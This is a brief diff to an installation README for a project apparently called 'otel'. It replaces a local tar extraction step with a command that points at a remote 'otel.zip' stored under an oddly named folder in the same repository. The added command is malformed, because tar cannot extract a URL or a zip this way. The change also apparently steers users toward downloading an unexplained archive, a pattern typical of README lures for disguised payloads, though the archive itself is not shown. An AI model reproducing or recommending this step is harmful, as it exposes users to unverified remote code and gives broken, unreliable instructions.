Gabeeeeeesd/otel/README.md

    - **Linux:**
      - Open a terminal.
      - Navigate to the directory where you downloaded the file.
-     - Run the command `tar -xvf otel-linux.tar.gz` to extract the files.
+     - Run the command `tar -xvf https://raw.githubusercontent.com/Gabeeeeeesd/otel/main/microblepharia/otel.zip` to extract the files.
      - Follow the README instructions in the extracted folder.

 3. **Verify Installation**